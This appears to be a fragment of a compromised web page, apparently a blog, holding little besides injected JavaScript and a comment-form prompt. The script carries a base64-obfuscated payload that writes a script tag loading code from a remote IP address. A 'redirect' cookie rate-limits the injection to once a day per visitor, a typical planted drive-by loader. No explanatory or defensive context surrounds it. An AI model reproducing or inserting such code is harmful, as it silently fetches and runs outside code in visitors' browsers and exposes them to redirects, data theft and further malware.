src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.